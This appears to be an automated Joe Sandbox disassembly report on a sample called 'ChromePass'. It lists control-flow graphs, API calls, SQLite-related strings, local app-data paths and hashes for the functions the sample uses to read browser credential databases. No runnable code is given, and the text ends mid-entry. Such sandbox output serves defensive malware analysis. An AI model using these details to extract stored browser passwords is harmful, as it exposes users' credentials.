                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                        • String ID: .cfg$/external$SaveFilterIndex$ShowGridLines$ShowInfoTip
                                        • API String ID: 776488737-70440992
                                        • Opcode ID: 9f0940807e79b34fa8acd1bb0c5ca660b4dc9a2855fd62aba484d8026d41d478
                                        • Instruction ID: eace5aa0097f5313b0bb8351d432f4c8056799947b8a36fbe208cfe9949a56c2
                                        • Opcode Fuzzy Hash: 9f0940807e79b34fa8acd1bb0c5ca660b4dc9a2855fd62aba484d8026d41d478
                                        • Instruction Fuzzy Hash: D041C7326502289BDB10EF50DC85FCA7379FF44714F4400BAE90CAB281D775AA94CF99

                                        Control-flow Graph

                                        control_flow_graph 227 40eb21-40eb6d call 40b0a5 230 40ee20-40ee22 227->230 231 40eb73-40eb78 227->231 234 40ee23-40ee27 230->234 232 40eb7a-40eb7d 231->232 233 40eb8b-40eb91 231->233 232->233 235 40eb7f-40eb89 232->235 237 40eb94-40eb99 233->237 235->237 239 40eba8-40ebc9 strlen 237->239 240 40eb9b-40eba3 call 40b168 237->240 244 40ebcb 239->244 245 40ebdd-40ec06 strlen call 40b358 239->245 240->234 246 40ebcd-40ebd8 call 40b168 244->246 250 40ec08-40ec0b 245->250 251 40ec0d-40ec8a memcpy * 2 call 40b168 245->251 246->234 250->246 255 40ed03-40ed0a 251->255 256 40ec8c-40ec8f 251->256 257 40ed0e-40ed17 call 40b358 255->257 256->255 258 40ec91-40ec99 256->258 263 40ed1d-40ed24 257->263 260 40eca4-40ecb8 call 40d302 258->260 261 40ec9b-40eca2 258->261 266 40ecbb-40ecce 260->266 261->263 264 40ee0a-40ee1e call 40aee8 call 40b168 263->264 265 40ed2a-40ed49 memcpy strlen 263->265 264->230 264->234 267 40ed66-40ed98 memcpy * 2 265->267 268 40ed4b-40ed4e 265->268 266->263 270 40ecd0-40ecd2 266->270 274 40eda4 267->274 275 40ed9a-40ed9d 267->275 271 40ed52-40ed55 268->271 270->257 273 40ecd4-40ecde 270->273 278 40ed57-40ed5b 271->278 279 40ed5d-40ed5f 271->279 281 40ece0-40ece4 273->281 282 40ece6 273->282 277 40eda6-40edd6 274->277 275->274 276 40ed9f-40eda2 275->276 276->277 284 40ede1-40ede3 277->284 285 40edd8-40eddb 277->285 278->271 278->279 279->267 286 40ed61 279->286 283 40eceb-40ecf0 281->283 282->283 283->257 288 40ecf2-40ecfc 283->288 290 40ede4-40ee08 call 40e6f7 284->290 285->284 289 40eddd-40eddf 285->289 286->267 288->257 292 40ecfe-40ed01 288->292 289->290 290->234 292->257
                                        APIs
                                          • Part of subcall function 0040B0A5: malloc.MSVCRT ref: 0040B0F0
                                          • Part of subcall function 0040B0A5: malloc.MSVCRT ref: 0040B104
                                          • Part of subcall function 0040B0A5: RtlLeaveCriticalSection.NTDLL(0043551C), ref: 0040B15B
                                        • strlen.MSVCRT ref: 0040EBA8
                                        • strlen.MSVCRT ref: 0040EBDE
                                          • Part of subcall function 0040B358: memset.MSVCRT ref: 0040B371
                                        • memcpy.MSVCRT(?,000007D0,00000001,?,?,?,?,?,?,?,?,?,00410C24,00000000,00000000,0042AC9A), ref: 0040EC5C
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00410C24), ref: 0040EC74
                                        • memcpy.MSVCRT(?,?,00000001), ref: 0040ED34
                                        • strlen.MSVCRT ref: 0040ED3F
                                        • memcpy.MSVCRT(?,?,00000000), ref: 0040ED6D
                                        • memcpy.MSVCRT(?,-journal,00000009), ref: 0040ED82
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcpy$strlen$malloc$CriticalLeaveSectionmemset
                                        • String ID: -journal
                                        • API String ID: 1510558235-1536856285
                                        • Opcode ID: fbb199ba0ef64d3f97f9b5421cca5cc1d61e37d92d1b1f551cda37044c5f7e6e
                                        • Instruction ID: 1732a50d433f44b5b02993768ac65b073ba47fe387846747f47436a70ea83e0f
                                        • Opcode Fuzzy Hash: fbb199ba0ef64d3f97f9b5421cca5cc1d61e37d92d1b1f551cda37044c5f7e6e
                                        • Instruction Fuzzy Hash: F7B1E371A0460AAFDB14DF6AC840AAABBB4FF44304F14443FE415E7791D738E920CB99

                                        Control-flow Graph

                                        control_flow_graph 296 40d402-40d416 call 40d2cb 299 40d420-40d42b call 40cc6d 296->299 300 40d418-40d41b 296->300 304 40d461-40d46f DeleteFileA 299->304 305 40d42d-40d43b DeleteFileW 299->305 301 40d4a9-40d4ab 300->301 307 40d489-40d491 GetFileAttributesA 304->307 306 40d455-40d45d GetFileAttributesW 305->306 308 40d43d-40d448 306->308 309 40d45f 306->309 310 40d471-40d47c 307->310 311 40d493-40d4a8 free 307->311 308->311 312 40d44a-40d453 Sleep DeleteFileW 308->312 309->311 310->311 313 40d47e-40d487 Sleep DeleteFileA 310->313 311->301 312->306 313->307
                                        APIs
                                        • DeleteFileW.KERNELBASE(00000000), ref: 0040D433
                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 0040D456
                                        • free.MSVCRT ref: 0040D494
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: File$AttributesDeletefree
                                        • String ID:
                                        • API String ID: 899649792-0
                                        • Opcode ID: 21823efabf6285c37c58730a3fdeb471495d32440ef08df67c571e7b1c4d548c
                                        • Instruction ID: d5d8acf5ea5555f551e5f5386180507f99cb375a4ad394c8bf74bc31f1c79b69
                                        • Opcode Fuzzy Hash: 21823efabf6285c37c58730a3fdeb471495d32440ef08df67c571e7b1c4d548c
                                        • Instruction Fuzzy Hash: 6A11A331A057119BD210AFE5ECC5A7E73A5EF41329F500A36F612E61D0CB38AC0A465E

                                        Control-flow Graph

                                        control_flow_graph 314 42182f-421876 call 421733 317 421883-42189d call 41c70f 314->317 318 421878-42187e 314->318 324 4218a3-4218ae 317->324 325 42189f 317->325 319 421af8-421afc 318->319 322 421b07 319->322 323 421afe-421b05 319->323 326 421b0b 322->326 323->322 323->326 327 4218b0-4218b2 324->327 328 4218b7-4218c4 call 40b358 324->328 325->324 329 421b0e-421b11 326->329 327->329 332 4218d2-4218e7 call 411345 328->332 333 4218c6-4218cd 328->333 336 421916-421918 332->336 337 4218e9-4218ec 332->337 333->322 338 42191b-42191e 336->338 339 42195e-42196d memset 337->339 340 4218ee-4218f6 337->340 342 421920-42193b call 413932 338->342 343 42193d-421942 338->343 341 421971-42197e 339->341 344 4218f8-4218fd call 42a676 340->344 345 4218ff 340->345 347 421980-421989 341->347 348 4219cc-4219d6 341->348 342->338 342->343 350 421944-42194c 343->350 351 42196f 343->351 346 421904 344->346 345->346 353 421905-421911 call 40b4a0 346->353 354 4219a7-4219ad 347->354 355 42198b-4219a5 call 41df36 347->355 359 4219db-4219ef 348->359 357 421955 350->357 358 42194e-421953 call 42a676 350->358 351->341 376 421ae9-421af7 call 411369 call 40b168 353->376 354->359 364 4219af-4219b0 354->364 355->359 361 42195a-42195c 357->361 358->361 366 4219f1-4219f6 359->366 367 4219f8 359->367 361->353 372 4219b5-4219c7 call 40b4a0 364->372 366->367 368 4219fa 367->368 369 4219fc-421a15 367->369 368->369 374 421a17-421a1a 369->374 375 421a1c 369->375 372->376 378 421a1f-421a2f 374->378 375->378 376->319 382 421a31 378->382 383 421a35-421a3c 378->383 382->383 385 421a49-421a4c 383->385 386 421a3e-421a44 383->386 388 421a5b-421a5f 385->388 389 421a4e-421a52 385->389 386->372 391 421a61-421a64 388->391 392 421a66-421a92 call 40be35 call 4213a0 388->392 389->388 390 421a54 389->390 390->388 393 421ab1-421ab5 391->393 402 421a97-421aa0 392->402 396 421ab7-421ac7 call 41c8c3 393->396 397 421ac9-421acc 393->397 396->397 400 421ad7-421ae6 397->400 401 421ace-421ad5 397->401 400->376 401->376 401->400 404 421aa2-421aa5 402->404 405 421aa8-421aaf call 40b168 402->405 405->393
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BINARY$CREATE TABLE sqlite_master( type text, name text, tbl_name text, rootpage integer, sql text)$SELECT name, rootpage, sql FROM '%q'.%s$attached databases must use the same text encoding as main database$sqlite_master$unknown error$unsupported file format
                                        • API String ID: 0-396201868
                                        • Opcode ID: 0dbd58db18a303ede070059acf98b40a1b07f1af334670792e97db6cd46daae2
                                        • Instruction ID: 262f377a753724a7193ef86df1f6d7a84022e52c7a7eaf545041a9d1d484f6cd
                                        • Opcode Fuzzy Hash: 0dbd58db18a303ede070059acf98b40a1b07f1af334670792e97db6cd46daae2
                                        • Instruction Fuzzy Hash: 17A1D470B00254EFDB14CF95E880AAEBBF5EF55304F64806BE401AB362D778DA81CB19

                                        Control-flow Graph

                                        control_flow_graph 408 4213a0-4213c1 409 4213c3-4213c5 408->409 410 4213ca-4213d0 call 40b344 408->410 411 42163d-421643 409->411 413 4213d5-4213d9 410->413 414 4213f5-4213fb 413->414 415 4213db-4213e0 413->415 417 4215a8-4215ae 414->417 418 421401-421426 call 421e76 414->418 416 4213e6-4213ef 415->416 415->417 416->414 416->417 420 4215b0 call 4161c6 417->420 421 4215b5-4215ba 417->421 418->413 426 421428-42142e 418->426 420->421 424 4215c6-4215d7 call 40b517 421->424 425 4215bc-4215c5 call 40b168 421->425 433 421621-421626 424->433 434 4215d9-4215e2 call 42a9c6 424->434 425->424 429 421430-421437 426->429 430 421439-42143f 426->430 429->413 435 421443-421447 call 41637d 430->435 438 42162b-42163b RtlLeaveCriticalSection 433->438 439 421628 433->439 434->433 442 4215e4-4215e9 434->442 441 42144c-421454 435->441 438->411 439->438 443 42145a-42145d 441->443 444 42153e-421543 441->444 442->438 445 4215eb-421607 call 42a958 strlen call 40b0a5 442->445 447 42147e-421482 443->447 448 42145f-421462 443->448 444->435 446 421549-42155f call 4161c6 444->446 445->438 479 421609-42161f call 42a958 memcpy 445->479 467 421582-421592 call 40b168 446->467 468 421561-42156c 446->468 449 421484-421488 447->449 450 4214d5-4214da 447->450 448->444 453 421468-42146c 448->453 454 4214a6-4214aa 449->454 455 42148a-4214a0 call 40b37e 449->455 457 421525-421539 450->457 458 4214dc-4214e9 450->458 453->446 460 421472-421478 453->460 462 4214cb-4214d3 454->462 463 4214ac-4214c0 call 4165ef 454->463 455->417 455->454 480 4215a0 457->480 481 42153b 457->481 465 421523 458->465 466 4214eb-421501 call 4165d1 458->466 460->446 460->447 462->450 483 4214c6-4214c9 463->483 484 421597-42159e 463->484 465->457 486 421503-42151c call 416554 call 4165ad 466->486 487 42151e-421521 466->487 467->413 475 421574-421580 isspace 468->475 475->467 476 42156e-421571 475->476 476->475 479->438 480->417 481->444 483->462 483->463 484->417 486->484 486->487 487->465 487->466
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d$sqlite_master
                                        • API String ID: 0-2024178973
                                        • Opcode ID: fd87d88d8173a76365dedaef42ca68be072c9ea8b686464921c50fd662290fb9
                                        • Instruction ID: 26b11de5f6bb12c0c6a6b2ac4e126577f77fe26de064d4a84f2ce22cd1c4592d
                                        • Opcode Fuzzy Hash: fd87d88d8173a76365dedaef42ca68be072c9ea8b686464921c50fd662290fb9
                                        • Instruction Fuzzy Hash: C0818C716083229FCB10DF25E88051FBBE4AFA4358F94096FF88596261D738CD85CB9A

                                        Control-flow Graph

                                        control_flow_graph 493 40244f-40249b memset 494 4024a1-4024c7 wcslen * 2 493->494 495 402535-40253b call 40a919 493->495 497 4024c9-4024da call 404d63 494->497 498 4024dc 494->498 499 402540-402553 call 40226e 495->499 501 4024e4-402510 call 40226e wcslen * 2 497->501 498->501 507 402512-402529 call 404d63 501->507 508 40252b-402533 501->508 507->499 508->499
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: wcslen$memsetwcscatwcscpy
                                        • String ID: AppData\Local$Local Settings\Application Data
                                        • API String ID: 3932597654-2996314811
                                        • Opcode ID: 69e01f8076d3b357dd7e221ab67cb876b231f79aa770a8d6094f68b35eb08fdc
                                        • Instruction ID: 06701e109a7cb230437e1991fe34eff5cd467569b5a47b7ee8921bcf04c6820e
                                        • Opcode Fuzzy Hash: 69e01f8076d3b357dd7e221ab67cb876b231f79aa770a8d6094f68b35eb08fdc
                                        • Instruction Fuzzy Hash: 1321877294411DABDB10EB50DE8AACDB7A9AF10319F5000BBE908F31C1EB785F448A59

                                        Control-flow Graph

                                        • Graph image not recoverable: function 0x4230d6, basic blocks 0x4230d6..0x42352f; named API in the graph: strlen (executed/not-executed colouring lost)
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: strlen
                                        • String ID: %s.%s$no such table: %s$no tables specified$too many columns in result set$>B
                                        • API String ID: 39653677-4135391130
                                        • Opcode ID: 2a54dacd3136a16c71cc0564ebcf3d1b3cccd856b24915ac04d2e1659a7a1fe4
                                        • Instruction ID: 2fe2712b2c084e770219046fa2d6f9b8a09801a94f1ee17c50ed802ec21f6b52
                                        • Opcode Fuzzy Hash: 2a54dacd3136a16c71cc0564ebcf3d1b3cccd856b24915ac04d2e1659a7a1fe4
                                        • Instruction Fuzzy Hash: A0E16071A00229EFDF15DF95E4806AEB7B1BF48315F64809BE805AB351D73CAE81CB58

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0040A8EA: LoadLibraryW.KERNEL32(shell32.dll,0040A928,?), ref: 0040A8F8
                                          • Part of subcall function 0040A8EA: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040A90D
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040A93C
                                        • memset.MSVCRT ref: 0040A958
                                        • RegCloseKey.ADVAPI32(?,00A524F0,?,?,?,?,?), ref: 0040A98F
                                        • wcscpy.MSVCRT ref: 0040A99E
                                          • Part of subcall function 00404D2E: GetVersionExW.KERNEL32(004355D8,00A524F0,0040A937,?), ref: 00404D48
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
                                        • String ID: @%@
                                        • API String ID: 2699640517-301254053
                                        • Opcode ID: c85f144fac34b3a79468d4b7e9426a826a46006cdde34c786ca7b16a021c4ff8
                                        • Instruction ID: b7cd3f15b71cd0ad239d335dfb1030cea571aafd2f0d5927420644d2378f0aab
                                        • Opcode Fuzzy Hash: c85f144fac34b3a79468d4b7e9426a826a46006cdde34c786ca7b16a021c4ff8
                                        • Instruction Fuzzy Hash: E601B1B2500218AEEB21B755EC4AEAF737DDF84314F20047BF909B1081EA785E519A6A

                                        Control-flow Graph

                                        • Graph image not recoverable: function 0x40d302, basic blocks 0x40d302..0x40d401; named APIs in the graph: CreateFileW, CreateFileA, free, memset (executed/not-executed colouring lost)
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: free$CreateFilememset
                                        • String ID:
                                        • API String ID: 2788672648-0
                                        • Opcode ID: 16eabc54f8117ac22137bdf6d5286ec79333c897b9022d702143434dc562c034
                                        • Instruction ID: 54aeaa6a2a1cf82cd853e95d5e6fbbb13f587397237ff6230706a4c831c0e42a
                                        • Opcode Fuzzy Hash: 16eabc54f8117ac22137bdf6d5286ec79333c897b9022d702143434dc562c034
                                        • Instruction Fuzzy Hash: AC21E472E10215ABEB109FA5ED02B9E3BA0AB00714F25413AFD05F72C1D6788D14979A

                                        Control-flow Graph

                                        • Graph image not recoverable: function 0x4094d3, basic blocks 0x4094d3..0x4095a7; named APIs in the graph: ??2@YAPAXI@Z (operator new), DeleteObject, GetModuleHandleW, LoadIconW (executed/not-executed colouring lost)
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000420,00000000,?,?,?,004097B7), ref: 004094F2
                                        • ??2@YAPAXI@Z.MSVCRT(00000D08,00000000,?,?,?,004097B7), ref: 00409522
                                        • DeleteObject.GDI32(?), ref: 00409546
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,004097B7), ref: 0040958C
                                        • LoadIconW.USER32(00000000,00000065), ref: 00409595
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                        • String ID:
                                        • API String ID: 659443934-0
                                        • Opcode ID: 413f477a48ca695b15e951cecf6be7b012c71d6df656ba6907d2bf537f542b32
                                        • Instruction ID: 1f32562663df79b2ec97770a1dd64008754b28810ad5a2be0de314d305e9853f
                                        • Opcode Fuzzy Hash: 413f477a48ca695b15e951cecf6be7b012c71d6df656ba6907d2bf537f542b32
                                        • Instruction Fuzzy Hash: 01118EB1A017049FC720AF76AC49697BBE8EF40714F914A2FE05E93252DF7964118B5C

                                        Control-flow Graph

                                        • Graph image not recoverable: function 0x41fe26, basic blocks 0x41fe26..0x41ff9c; named API in the graph: strlen (executed/not-executed colouring lost)
                                        APIs
                                          • Part of subcall function 0042A7BB: strlen.MSVCRT ref: 0042A7E2
                                        • strlen.MSVCRT ref: 0041FE75
                                          • Part of subcall function 0041DF67: memcpy.MSVCRT(0000001C,0042AD04,00000000), ref: 0041E032
                                        • strlen.MSVCRT ref: 0041FF1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: strlen$memcpy
                                        • String ID: sqlite_attach$sqlite_detach
                                        • API String ID: 3396830738-2911676521
                                        • Opcode ID: cbd989dd5f3dfdd19fe536a7f8247246f5a83751997b85c6d5ef52342c090b33
                                        • Instruction ID: 9f800a9b43953b92a13c2d88aa0105c020479341f39a39680abb38540f6e8e79
                                        • Opcode Fuzzy Hash: cbd989dd5f3dfdd19fe536a7f8247246f5a83751997b85c6d5ef52342c090b33
                                        • Instruction Fuzzy Hash: 8D312FF1F002D83EDF11A9658D41FFF3959DF01309F850067FC0849552D9994E9692AF
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 0040CE9E
                                        • GetLastError.KERNEL32 ref: 0040CEA9
                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0040CECB
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: File$ErrorLastPointerRead
                                        • String ID:
                                        • API String ID: 64821003-0
                                        • Opcode ID: cac00678367dc1ffc0cc365e7784bde4dd87dc4686d4e8b9d5d24541141ca56f
                                        • Instruction ID: 69adeb8de98025fbfa3a48c9e10f36df1da8062b63096b4fa0374bb7a0929c9d
                                        • Opcode Fuzzy Hash: cac00678367dc1ffc0cc365e7784bde4dd87dc4686d4e8b9d5d24541141ca56f
                                        • Instruction Fuzzy Hash: A8016D72600109FBDB208F68DC86BAB77ADEB043A0F604632F915E76D0D674DD119BE9
                                        APIs
                                        • FindResourceW.KERNELBASE(?,?,?), ref: 0040A856
                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040A867
                                        • LoadResource.KERNEL32(?,00000000), ref: 0040A877
                                        • LockResource.KERNEL32(00000000), ref: 0040A882
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: ff310cec3ba99e44ab855ab72765dfe61c206a8eafc61545917f87ef2000338e
                                        • Instruction ID: 14b3a58c3e0c40f06e12b542eb8fbad9b2c2feec5bc92fc1ebff960accc3b51d
                                        • Opcode Fuzzy Hash: ff310cec3ba99e44ab855ab72765dfe61c206a8eafc61545917f87ef2000338e
                                        • Instruction Fuzzy Hash: 410184327003156BCB256F95DC8995BBF6AFF85391748D03AEC05DA2A1D770C826CE88
                                        APIs
                                        • memset.MSVCRT ref: 0040A5CF
                                          • Part of subcall function 0040525E: _snwprintf.MSVCRT ref: 004052A3
                                          • Part of subcall function 0040525E: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 004052B3
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040A5F8
                                        • memset.MSVCRT ref: 0040A602
                                        • GetPrivateProfileStringW.KERNEL32(?,?,0042C47C,?,00002000,?), ref: 0040A624
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
